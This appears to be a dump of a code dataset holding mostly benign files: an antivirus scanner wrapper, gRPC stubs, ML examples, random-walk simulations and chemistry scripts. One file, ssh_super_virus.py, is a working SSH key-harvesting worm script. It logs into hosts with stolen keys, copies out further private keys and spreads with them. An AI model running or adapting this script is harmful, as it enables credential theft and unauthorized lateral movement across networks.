max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
probe/modules/antivirus/sophos/sophos.py | krisshol/bach-kmno | 248 | 12669401 | #
# Copyright (c) 2013-2018 Quarkslab.
# This file is part of IRMA project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the top-level directory
# of this distribution and at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# No part of the project, including this file, may be copied,
# modified, propagated, or distributed except according to the
# terms contained in the LICENSE file.
import logging
import re
import os
from pathlib import Path
from modules.antivirus.base import AntivirusUnix
log = logging.getLogger(__name__)
class Sophos(AntivirusUnix):
name = "Sophos Anti-Virus (Linux)"
# ==================================
# Constructor and destructor stuff
# ==================================
def __init__(self, *args, **kwargs):
# class super class constructor
super().__init__(*args, **kwargs)
# scan tool variables
self.scan_args = (
"-archive", # scan inside archives
"-cab", # scan microsoft cab file
"-loopback", # scan loopback-type file
"-tnef", # scan tnet file
"-mime", # scan file encoded with mime format
"-oe", # scan microsoft outlook
"-pua", # scan file encoded with mime format
"-ss", # only print errors or found viruses
"-nc", # do not ask remove confirmation when infected
"-nb", # no bell sound
)
# NOTE: on windows, 0 can be returned even if the file is infected
self._scan_retcodes[self.ScanResult.INFECTED] = \
lambda x: x in [0, 1, 2, 3]
self.scan_patterns = [
re.compile(">>> Virus '(?P<name>.+)' found in file (?P<file>.+)",
re.IGNORECASE),
]
# ==========================================
# Antivirus methods (need to be overriden)
# ==========================================
def get_version(self):
"""return the version of the antivirus"""
return self._run_and_parse(
'--version',
regexp='(?P<version>\d+(\.\d+)+)',
group='version')
def get_database(self):
"""return list of files in the database"""
# NOTE: we can use clamconf to get database location, but it is not
# always installed by default. Instead, hardcode some common paths and
# locate files using predefined patterns
search_paths = [
Path('/opt/sophos-av/lib/sav'), # default location in debian
]
database_patterns = [
'*.dat',
'vdl??.vdb',
'sus??.vdb',
'*.ide',
]
return self.locate(database_patterns, search_paths, syspath=False)
def get_scan_path(self):
"""return the full path of the scan tool"""
return self.locate_one("savscan", paths=[Path("/opt/sophos-av/bin")])
def scan(self, paths):
# quirk to force lang in linux
os.environ['LANG'] = "C"
return super().scan(paths)
def get_virus_database_version(self):
"""Return the Virus Database version"""
retcode, stdout, _ = self.run_cmd(self.scan_path, '-v')
if retcode:
raise RuntimeError(
"Bad return code while getting database version")
matches = re.search('Virus data version *: *(?P<version>.*)',
stdout,
re.IGNORECASE)
if not matches:
raise RuntimeError("Cannot read database version in stdout")
version = matches.group('version').strip()
matches = re.search('Released *: *'
'(?P<date>\d\d \w+ \d\d\d\d)',
stdout,
re.IGNORECASE)
if not matches:
return version
date = matches.group('date').strip()
return version + ' (' + date + ')'
|
crowd_anki/export/deck_exporter.py | ll-in-anki/CrowdAnki | 391 | 12669416 | from abc import abstractmethod, ABC
from pathlib import Path
from ..anki.adapters.anki_deck import AnkiDeck
class DeckExporter(ABC):
@abstractmethod
def export_to_directory(self, deck: AnkiDeck, output_dir: Path, copy_media=True) -> Path:
pass
|
hfc/protos/gossip/message_pb2_grpc.py | roviso/hyberledger-py | 389 | 12669428 | <filename>hfc/protos/gossip/message_pb2_grpc.py
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from hfc.protos.gossip import message_pb2 as hfc_dot_protos_dot_gossip_dot_message__pb2
class GossipStub(object):
"""Gossip
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GossipStream = channel.stream_stream(
'/gossip.Gossip/GossipStream',
request_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.SerializeToString,
response_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.FromString,
)
self.Ping = channel.unary_unary(
'/gossip.Gossip/Ping',
request_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.SerializeToString,
response_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.FromString,
)
class GossipServicer(object):
"""Gossip
"""
def GossipStream(self, request_iterator, context):
"""GossipStream is the gRPC stream used for sending and receiving messages
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Ping(self, request, context):
"""Ping is used to probe a remote peer's aliveness
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_GossipServicer_to_server(servicer, server):
rpc_method_handlers = {
'GossipStream': grpc.stream_stream_rpc_method_handler(
servicer.GossipStream,
request_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.FromString,
response_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.SerializeToString,
),
'Ping': grpc.unary_unary_rpc_method_handler(
servicer.Ping,
request_deserializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.FromString,
response_serializer=hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'gossip.Gossip', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Gossip(object):
"""Gossip
"""
@staticmethod
def GossipStream(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_stream(request_iterator, target, '/gossip.Gossip/GossipStream',
hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.SerializeToString,
hfc_dot_protos_dot_gossip_dot_message__pb2.Envelope.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Ping(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/gossip.Gossip/Ping',
hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.SerializeToString,
hfc_dot_protos_dot_gossip_dot_message__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
node_launcher/node_set/bitcoind/bitcoind_software.py | ryan-lingle/node-launcher | 249 | 12669576 | <reponame>ryan-lingle/node-launcher
from node_launcher.constants import (
IS_LINUX,
IS_MACOS,
IS_WINDOWS,
OPERATING_SYSTEM,
TARGET_BITCOIN_RELEASE
)
from node_launcher.node_set.lib.software import Software
class BitcoindSoftware(Software):
def __init__(self):
super().__init__(
software_name='bitcoind',
release_version=TARGET_BITCOIN_RELEASE
)
self.release_version = TARGET_BITCOIN_RELEASE.replace('v', '')
if IS_WINDOWS:
os_name = 'win64'
elif IS_MACOS:
os_name = 'osx64'
elif IS_LINUX:
os_name = 'x86_64-linux-gnu'
else:
raise Exception(f'{OPERATING_SYSTEM} is not supported')
self.download_name = f'bitcoin-{self.release_version}-{os_name}'
self.download_url = f'https://bitcoincore.org' \
f'/bin' \
f'/bitcoin-core-{self.release_version}' \
f'/{self.download_destination_file_name}'
@property
def daemon(self):
return self.bitcoind
@property
def cli(self):
return self.bitcoin_cli
@property
def bitcoin_qt(self) -> str:
return self.executable_path('bitcoin-qt')
@property
def bitcoin_cli(self) -> str:
return self.executable_path('bitcoin-cli')
@property
def bitcoind(self) -> str:
return self.executable_path('bitcoind')
@property
def uncompressed_directory_name(self) -> str:
if IS_LINUX:
name = '-'.join(self.download_name.split('-')[0:2])
else:
name = '-'.join(self.download_name.split('-')[:-1])
if name.count('.') == 3:
name = '.'.join(name.split('.')[:-1])
return name
|
addons/metadata.themoviedb.org.python/python/lib/tmdbscraper/tmdbapi.py | RetroFlix/retroflix.repo | 420 | 12669591 | # -*- coding: UTF-8 -*-
#
# Copyright (C) 2020, <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# pylint: disable=missing-docstring
"""Functions to interact with TMDb API."""
from . import api_utils
import xbmc
try:
from typing import Optional, Text, Dict, List, Any # pylint: disable=unused-import
InfoType = Dict[Text, Any] # pylint: disable=invalid-name
except ImportError:
pass
HEADERS = (
('User-Agent', 'Kodi Movie scraper by Team Kodi'),
('Accept', 'application/json'),
)
api_utils.set_headers(dict(HEADERS))
TMDB_PARAMS = {'api_key': '<KEY>'}
BASE_URL = 'https://api.themoviedb.org/3/{}'
SEARCH_URL = BASE_URL.format('search/movie')
FIND_URL = BASE_URL.format('find/{}')
MOVIE_URL = BASE_URL.format('movie/{}')
COLLECTION_URL = BASE_URL.format('collection/{}')
CONFIG_URL = BASE_URL.format('configuration')
def search_movie(query, year=None, language=None):
# type: (Text) -> List[InfoType]
"""
Search for a movie
:param title: movie title to search
:param year: the year to search (optional)
:param language: the language filter for TMDb (optional)
:return: a list with found movies
"""
xbmc.log('using title of %s to find movie' % query, xbmc.LOGDEBUG)
theurl = SEARCH_URL
params = _set_params(None, language)
params['query'] = query
if year is not None:
params['year'] = str(year)
return api_utils.load_info(theurl, params=params)
def find_movie_by_external_id(external_id, language=None):
# type: (Text) -> List[InfoType]
"""
Find movie based on external ID
:param mid: external ID
:param language: the language filter for TMDb (optional)
:return: the movie or error
"""
xbmc.log('using external id of %s to find movie' % external_id, xbmc.LOGDEBUG)
theurl = FIND_URL.format(external_id)
params = _set_params(None, language)
params['external_source'] = 'imdb_id'
return api_utils.load_info(theurl, params=params)
def get_movie(mid, language=None, append_to_response=None):
# type: (Text) -> List[InfoType]
"""
Get movie details
:param mid: TMDb movie ID
:param language: the language filter for TMDb (optional)
:append_to_response: the additional data to get from TMDb (optional)
:return: the movie or error
"""
xbmc.log('using movie id of %s to get movie details' % mid, xbmc.LOGDEBUG)
theurl = MOVIE_URL.format(mid)
return api_utils.load_info(theurl, params=_set_params(append_to_response, language))
def get_collection(collection_id, language=None, append_to_response=None):
# type: (Text) -> List[InfoType]
"""
Get movie collection information
:param collection_id: TMDb collection ID
:param language: the language filter for TMDb (optional)
:append_to_response: the additional data to get from TMDb (optional)
:return: the movie or error
"""
xbmc.log('using collection id of %s to get collection details' % collection_id, xbmc.LOGDEBUG)
theurl = COLLECTION_URL.format(collection_id)
return api_utils.load_info(theurl, params=_set_params(append_to_response, language))
def get_configuration():
# type: (Text) -> List[InfoType]
"""
Get configuration information
:return: configuration details or error
"""
xbmc.log('getting configuration details', xbmc.LOGDEBUG)
return api_utils.load_info(CONFIG_URL, params=TMDB_PARAMS.copy())
def _set_params(append_to_response, language):
params = TMDB_PARAMS.copy()
img_lang = 'en,null'
if language is not None:
params['language'] = language
img_lang = '%s,en,null' % language[0:2]
if append_to_response is not None:
params['append_to_response'] = append_to_response
if 'images' in append_to_response:
params['include_image_language'] = img_lang
return params
|
packages/pyright-internal/src/tests/samples/lambda5.py | Jasha10/pyright | 3,934 | 12669614 | <gh_stars>1000+
# This sample tests the case where a lambda's type is determined using
# bidirectional type inference and one or more of the parameters
# corresponds to a generic type.
from typing import Callable, TypeVar, Generic, Any
T = TypeVar("T")
MsgT = TypeVar("MsgT", bound="Msg[Any]")
class Msg(Generic[T]):
body: T
class Request:
...
def check(func: "Callable[[MsgT, int], object]") -> MsgT:
...
notification: Msg[Request] = check(lambda msg, foo: (msg.body, foo))
|
qtrader/agents/persistence.py | aaron8tang/qtrader | 381 | 12669628 | <reponame>aaron8tang/qtrader<gh_stars>100-1000
import numpy as np
import pandas as pd
from qtrader.agents.base import Agent
from qtrader.utils.numpy import softmax
class PersistenceAgent(Agent):
"""Model-based **persistence** agent,
acting based on last observation
(i.e returns at t-1),
using softmax function."""
_id = 'persistence'
def __init__(self):
pass
def act(self, observation):
_returns = observation['returns']
if _returns.isnull().any():
# random sample
_values = pd.Series(np.random.uniform(0, 1, len(_returns)),
index=_returns.index,
name=_returns.name)
else:
# one step look back
_values = _returns
return softmax(_values)
|
src/purerpc/anyio_monkeypatch.py | decentral1se/purerpc | 143 | 12669641 | <gh_stars>100-1000
import os
import anyio
import logging
from anyio import run as _anyio_run
log = logging.getLogger(__name__)
def _new_run(func, *args, backend=None, backend_options=None):
if backend is None:
backend = os.getenv("PURERPC_BACKEND", "asyncio")
log.info("Selected {} backend".format(backend))
if backend == "uvloop":
import uvloop
uvloop.install()
backend = "asyncio"
return _anyio_run(func, *args, backend=backend, backend_options=backend_options)
def apply_monkeypatch():
"""Apply AnyIO monkeypatches (should merge upstream)"""
anyio.run = _new_run
|
src/clusto/drivers/locations/zones/basiczone.py | thekad/clusto | 216 | 12669678 | from clusto.drivers.base import Location
class BasicZone(Location):
"""
Basic zone driver.
"""
_clusto_type = "zone"
_driver_name = "basiczone"
|
examples/python-guide/Grabit_demo.py | fabsig/GPBoost | 310 | 12669710 | <filename>examples/python-guide/Grabit_demo.py
# -*- coding: utf-8 -*-
"""
Examples on how to use GPBoost for the Grabit model of Sigrist and Hirnschall (2019)
@author: <NAME>
"""
import sklearn.datasets as datasets
import numpy as np
import gpboost as gpb
"""
Example 1
"""
# simulate data
np.random.seed(1)
n = 10000
X, lp = datasets.make_friedman3(n_samples=n)
X_test, lp_test = datasets.make_friedman3(n_samples=n)
lp = lp*5+0.2
lp_test = lp_test*5+0.2
y = np.random.normal(loc=lp,scale=1)
y_test = np.random.normal(loc=lp_test,scale=1)
# apply censoring
yu = 8
yl = 5
y[y>=yu] = yu
y[y<=yl] = yl
# censoring fractions
print(np.sum(y==yu) / n)
print(np.sum(y==yl) / n)
# train model and make predictions
params = {'objective': 'tobit', 'verbose': 0, 'yl': yl, 'yu': yu}
dtrain = gpb.Dataset(X, y)
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
y_pred = bst.predict(X_test)
# mean square error (approx. 1.1 for n=10'000)
print("Test error of Grabit: " + str(((y_pred-y_test)**2).mean()))
# compare to standard least squares gradient boosting (approx. 1.8 for n=10'000)
params = {'objective': 'regression_l2', 'verbose': 0}
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
y_pred_ls = bst.predict(X_test)
print("Test error of standard least squares gradient boosting: " + str(((y_pred_ls-y_test)**2).mean()))
# measure time
import time
params = {'objective': 'tobit', 'verbose': 0, 'yl': yl, 'yu': yu}
dtrain = gpb.Dataset(X, y)
start = time.time()
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
end = time.time()
print(end - start)
# approx. 0.1 sec for n='10'000 on a standard laptop
"""
Example 2: 2-d non-linear function
"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def nonlin_fct(x1,x2):
r=x1**2+x2**2
r=np.pi*2*1*(r**0.75)
f=2*np.cos(r)
return(f)
def plot_2d_fct(x1,x2,y,title="2d function",elev=45,azim=120,zlim=None,filename=None):
fig = plt.figure(figsize=(8, 7))
ax = Axes3D(fig)
if zlim is not None:
ax.set_zlim3d(zlim)
surf = ax.plot_surface(x1, x2, y, rstride=1, cstride=1,
cmap=plt.cm.BuPu, edgecolor='k',vmax=zlim[1])
else:
surf = ax.plot_surface(x1, x2, y, rstride=1, cstride=1,
cmap=plt.cm.BuPu, edgecolor='k')
ax.set_xlabel("X1")
ax.set_ylabel("X2")
ax.set_zlabel('')
# pretty init view
ax.view_init(elev=elev, azim=azim)
plt.colorbar(surf)
plt.suptitle(title)
plt.subplots_adjust(top=0.9)
if filename is None:
plt.show()
else:
plt.savefig(filename,dpi=200)
##True function
nx = 100
x = np.arange(-1+1/nx,1,2/nx)
x1, x2 = np.meshgrid(x, x)
yt = nonlin_fct(x1,x2)
zlim = (-1.75,1.75)
plot_2d_fct(x1,x2,yt,title="True F",zlim=zlim)
# simulate data
n = 10000
np.random.seed(10)
X = np.random.rand(n,2)
X = (X-0.5)*2
y = nonlin_fct(X[:,0],X[:,1])+np.random.normal(scale=1, size=n)
# apply xensoring
yc = y.copy()
yl = np.percentile(y,q=33.33)
yu = np.percentile(y,q=66.66)
yc[y>=yu] = yu
yc[y<=yl] = yl
# train Grabit model and make predictions
params = {'objective': 'tobit', 'verbose': 0, 'yl': yl, 'yu': yu, 'sigma': 1.,
'learning_rate': 0.1, 'max_depth': 3}
dtrain = gpb.Dataset(X, yc)
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
X_pred = np.transpose(np.array([x1.flatten(),x2.flatten()]))
y_pred = bst.predict(X_pred)
plot_2d_fct(x1,x2,y_pred.reshape((100,-1)),title="Grabit",zlim=zlim)
# compare to standard least squares gradient boosting
params = {'objective': 'regression_l2', 'verbose': 0, 'yl': yl, 'yu': yu, 'sigma': 1.,
'learning_rate': 0.1, 'max_depth': 3}
dtrain = gpb.Dataset(X, yc)
bst = gpb.train(params=params, train_set=dtrain, num_boost_round=100)
X_pred = np.transpose(np.array([x1.flatten(),x2.flatten()]))
y_pred = bst.predict(X_pred)
plot_2d_fct(x1,x2,y_pred.reshape((100,-1)),title="L2 Boosting",zlim=zlim)
|
ssh_super_virus.py | HiMiC/scripts-averagesecurityguy | 877 | 12669715 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2013, AverageSecurityGuy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of AverageSecurityGuy nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import os
import re
re_login = re.compile(r'Please login as the user "(.*)" rather than')
def run_ssh_command(user, key, host, command):
'''
Run the specified command on the host.
'''
cmd = 'ssh -i {0} {1}@{2} "{3}"'.format(key, user, host, command)
output = os.popen4(cmd)
resp = output[1].read()
# Check for common errors and return None
if resp.find('Permission denied') > -1:
return None
# If no errors then return output of command
return resp
def do_something_evil(user, key, host):
'''
For penetration testers, this is called post exploitation and the list of
commands that are run would yield data used for exploiting other machines
on the network or for exfiltration. For Shaun and Tatu, this is where the
SSH super virus does its dirty work :). It is left up to the user to add
the appropriate commands to "steal, distort or destroy confidential data."
'''
evil_commands = []
for cmd in evil_commands:
resp = run_ssh_command(user, key, host, cmd)
if resp is not None:
print resp
def download_new_key(user, key, host, file):
'''Use SCP to copy new key files from the remote server.'''
print '[*] Attempting to download key {0}'.format(file)
src = '{0}@{1}:.ssh/{2}'.format(user, host, file)
dst = '{0}-{1}_{2}'.format(user, host, file)
cmd = 'scp -i {0} {1} {2}'.format(key, src, dst)
output = os.popen4(cmd)
resp = output[1].read()
# Check for common errors and return None
if resp.find('not a regular file') > -1:
print '[-] Unable to download key file {0}\n'.format(dst)
# If no errors then key file was downloaded
print '[+] New key file {0} downloaded.\n'.format(dst)
if dst not in new_keys:
new_keys.append(dst)
def login_with_key(user, key, host):
'''
Attempt to login to the SSH server at host with the user and key.
'''
print '[*] Attempting login to {0} with user {1} and key {2}'.format(host,
user, key)
resp = run_ssh_command(user, key, host, 'ls .ssh')
if resp is None:
print '[-] Login to {0}@{1} with key {2} failed\n'.format(user,
host, key)
else:
m = re_login.search(resp)
if m is not None:
# Received a message stating we need to login as a different user.
print '[-] Login to {0}@{1} with key {2} failed\n'.format(user,
host, key)
else:
print '[+] Login to {0}@{1} with key {2} succeeded'.format(user,
host, key)
for line in resp.split('\n'):
if line == 'authorized_keys':
continue
if line == 'known_hosts':
continue
if line == 'config':
continue
if line == '':
continue
download_new_key(user, key, host, line)
do_something_evil(user, key, host)
def load_keys():
'''
Load the initial set of SSH keys from the current directory. Prefix the
key filename with "username-" to use the specified username otherwise root
will be used. I assume the username will start with [a-z] and contain only
[a-z0-9_], if that is not the case, modify the regex at the top of the
script. Files with the extension ".pub" will be ignored.
'''
keys = []
print '[*] Loading SSH keys from current directory.'
for file in os.listdir('.'):
if file.endswith('.pub'):
continue
if file == 'users':
continue
if file == 'hosts':
continue
if file == os.path.basename(__file__):
continue
keys.append(file)
return keys
def load_users():
'''
Load user accounts from a file called 'users' in the current directory.
'''
u = []
print '[*] Loading user accounts.'
for line in open('users', 'r'):
if line == '\n':
continue
u.append(line.rstrip())
return u
def load_hosts():
'''
Load hostnames/ips from a file called 'hosts' in the current directory.
'''
h = []
print '[*] Loading hosts.'
for line in open('hosts', 'r'):
if line == '\n':
continue
h.append(line.rstrip())
return h
if __name__ == '__main__':
users = load_users()
hosts = load_hosts()
initial_keys = load_keys()
new_keys = []
print '[*] Testing loaded keys.'
for key in initial_keys:
for host in hosts:
for user in users:
login_with_key(user, key, host)
print '[*] Testing discovered keys'
while new_keys != []:
key = new_keys.pop(0)
for host in hosts:
for user in users:
login_with_key(user, key, host)
|
Python/ToLowerCaseTest.py | TonnyL/Windary | 205 | 12669735 | <gh_stars>100-1000
from unittest import TestCase
from ToLowerCase import ToLowerCase
class ToLowerCaseTest(TestCase):
def test_toLowerCase(self):
tlc = ToLowerCase()
self.assertEqual(tlc.toLowerCase("Hello"), "hello")
self.assertEqual(tlc.toLowerCase("here"), "here")
self.assertEqual(tlc.toLowerCase("LOVELY"), "lovely")
|
spk_id/make_fefeats_cfg.py | ishine/pase | 428 | 12669737 | <gh_stars>100-1000
import json
import glob
import os
DATA_PATH = '../fefeats/bsz16/epoch0'
epoch = list(range(0, 13))
splits = ['train', 'test', 'valid']
MAX_WAVS_SPK = {'train':100,
'test':10,
'valid':10}
spk2count = {}
cfg = {}
splits = ['train', 'test', 'valid']
spk2split = {}#0
spk2idx = {}
dataset = glob.glob('{}/all/*.npy'.format(DATA_PATH))
for filename in dataset:
fname = os.path.basename(filename)
bname = os.path.splitext(fname)[0]
spk_id = bname.split('_')[0]
if spk_id not in spk2count:
spk2count[spk_id] = {'train':0,
'test':0,
'valid':0}
spk2split[spk_id] = 0
spk2idx[spk_id] = len(spk2idx)
curr_split = spk2split[spk_id]
curr_samples = spk2count[spk_id][splits[curr_split]]
if curr_samples >= MAX_WAVS_SPK[splits[curr_split]]:
if curr_split >= len(splits) - 1:
continue
spk2split[spk_id] += 1
else:
if splits[curr_split] not in cfg:
cfg[splits[curr_split]] = {'wav_files':[],
'spk_ids':[]}
cfg[splits[curr_split]]['wav_files'].append(fname)
cfg[splits[curr_split]]['spk_ids'].append(spk_id)
spk2count[spk_id][splits[curr_split]] += 1
cfg['spk2idx'] = spk2idx
with open('bsz16_fefeats_data.cfg', 'w') as cfg_f:
cfg_f.write(json.dumps(cfg, indent=2))
|
website/meta/macros.py | sophieball/Cornell-Conversational-Analysis-Toolkit | 371 | 12669743 | # macro("example", lambda ctx: fetch(ctx, "site.title"))
|
doc/Programs/LecturePrograms/programs/RandomWalks/python/program4.py | kimrojas/ComputationalPhysicsMSU | 220 | 12669756 | # coding=utf-8
#
# 1D-randomwalk: A walker makes several steps,
# with a given number of walks pr. trial.
# Similar to program1, but this version also cumputes
# the probability of a gridpoint being "touched"
#
#Translated to Python by <NAME>
import numpy, sys, math
def mc_trial(number_walks,move_probability,walk_cum,walk2_cum, probability):
"""
Do a MonteCarlo trial, that is,
random-walk one particle.
Input:
- number_walks: Number of steps to walk the particle
- move_probability: Probability that the particle
will step right when doing a step
- walk_cum: Numpy-array of length number_walks + 1,
containing the sum of the position
of the particles as a function of time
(usefull to calculate mean pos. as a function
of time)
- walk2_cum: Same as walk_cum, but with the sum of the
positions squared
- probability: Number of times each gridpoint is hit
Output: As walk_cum, walk2_cum, and probability are (pointers to)
numpy arrays, they are altered also in the calling function.
"""
#Initial pos. As walk_cum[0]=walk2_cum[0] = 0.0
#by initialization, it is uneccessary to add this step to
#the arrays...
pos = 0;
for walk in xrange(number_walks+1):
if numpy.random.random() <= move_probability:
pos += 1
else:
pos -= 1
walk_cum[walk] += pos
walk2_cum[walk] += pos**2
#Zero-position of the array is the leftmost
#end of the grid
probability[pos+number_walks] += 1
def mc_sample(length,trials, number_walks, move_probability):
"""
Generate the probability distribution for finding
a walker at a gridpoint, after a number of walks on a
1d lattice with wrap-around boundary conditions
(\"pacman universe\")
Input:
- length: Lattice-points away from x=0
- trials: Number of MonteCarlo trials (number of walkers)
- move_probability: Probability of moving right
Output:
Normalized probability of finding a walker on a
specific grid position
"""
#Grid position of every walker
x = numpy.zeros(trials,numpy.int)
#Loop over timesteps and walkers,
#and find the walkers "ending positions"
for t in xrange(number_walks):
for i in xrange(trials):
if numpy.random.random() <= move_probability:
x[i] += 1
#Wraparound?
if x[i] > length:
x[i] = -length
else:
x[i] -= 1
if x[i] < -length:
x[i] = +length
#Calculate the probability of finding a walker
#each grid-position
probability = numpy.zeros(2*length+1)
for i in xrange(len(probability)):
pos = i-length
#count number of occurences of this pos i x array
count = 0
for j in xrange(len(x)):
if x[j] == pos:
count += 1
#Normalize and save
probability[i] = count/float(trials)
return probability
#Main program
#Get data from command-line arguments
if len(sys.argv) == 5:
length = int(sys.argv[1])
trials = int(sys.argv[2])
number_walks = int(sys.argv[3])
move_probability = float(sys.argv[4])
else:
print "Usage: python", sys.argv[0],\
"lenght trials number_walks move_probability"
sys.exit(0)
#Do the MC
probability = mc_sample(length,trials,number_walks,move_probability);
#Not reliable: ln(0)
#entropy = - numpy.sum(probability*numpy.log(probability))
entropy = 0.0
for i in xrange(len(probability)):
if probability[i] > 0.0:
entropy -= probability[i]*math.log(probability[i])
print "Timesteps =",number_walks
print "Walkers (num. trials) =",trials
print "Entropy =",entropy
print
if len(probability) <= 101:
print "Probability distribution (Flat => high entropy):"
print probability
else:
print "Probability distribution to big to print"
|
pyxtal/miscellaneous/mol.py | ubikpt/PyXtal | 127 | 12669775 | <reponame>ubikpt/PyXtal<gh_stars>100-1000
from rdkit import Chem
from rdkit.Chem import AllChem
import pymatgen as mg
from glob import glob
data = {}
data["HAHCOI"] = "s1c2ccc3scc4ccc(c1)c2c34"
data["JAPWIH"] = "s1ccc2cc3sc4cc5ccsc5cc4c3cc12"
data["WEXBOS"] = "s1c(c2ccccc2)c(c2ccccc2)c2c1c(c(s2)c1ccccc1)c1ccccc1"
data["LAGNAL"] = "s1c(/C=N/[C@H](C)c2ccc(F)cc2)ccc1/C=N/[C@H](C)c1ccc(F)cc1"
data["YICMOP"] = "s1cccc1c1c(F)c(OC)c(c2sccc2)c(F)c1OC"
data["MERQIM"] = "s1c2c(c3c1SCCC3)cc1sc3SCCCc3c1c2"
data["LUFHAW"] = "CC1=CC2=C(S1)C3=CC4=C(C=C3C=C2)C5=C(C=C4)C=C(S5)C"
#smi, cif = "s1c2ccc3scc4ccc(c1)c2c34", "HAHCOI.cif"
#smi, cif = "s1ccc2cc3sc4cc5ccsc5cc4c3cc12", "JAPWIH.cif"
#smi, cif = "s1c(c2ccccc2)c(c2ccccc2)c2c1c(c(s2)c1ccccc1)c1ccccc1", "WEXBOS.cif"
#smi, cif = "s1c(/C=N/[C@H](C)c2ccc(F)cc2)ccc1/C=N/[C@H](C)c1ccc(F)cc1","LAGNAL.cif"
#smi, cif = "s1cccc1c1c(F)c(OC)c(c2sccc2)c(F)c1OC", "YICMOP.cif"
#smi, cif = "s1c2c(c3c1SCCC3)cc1sc3SCCCc3c1c2", "MERQIM.cif"
#smi, cif = "CC1=CC2=C(S1)C3=CC4=C(C=C3C=C2)C5=C(C=C4)C=C(S5)C", "LUFHAW.cif"
for file in glob("*.cif"):
name = file[:-4]
if name in data.keys():
smi = data[name]
m = Chem.MolFromSmiles(smi)
m2 = Chem.AddHs(m)
AllChem.EmbedMolecule(m2)
cids = AllChem.EmbedMultipleConfs(m2, numConfs=1)
xyz = Chem.rdmolfiles.MolToXYZBlock(m2, 0)
mol = mg.Molecule.from_str(xyz, fmt="xyz")
mol.to(filename=name+".xyz")
|
generate/lib/run-firefox/cuddlefish/__init__.py | flamencist/browser-extensions | 102 | 12669793 | import sys
import os
import optparse
import webbrowser
from copy import copy
import simplejson as json
from cuddlefish import packaging
from cuddlefish.bunch import Bunch
from cuddlefish.version import get_version
MOZRUNNER_BIN_NOT_FOUND = 'Mozrunner could not locate your binary'
MOZRUNNER_BIN_NOT_FOUND_HELP = """
I can't find the application binary in any of its default locations
on your system. Please specify one using the -b/--binary option.
"""
UPDATE_RDF_FILENAME = "%s.update.rdf"
XPI_FILENAME = "%s.xpi"
usage = """
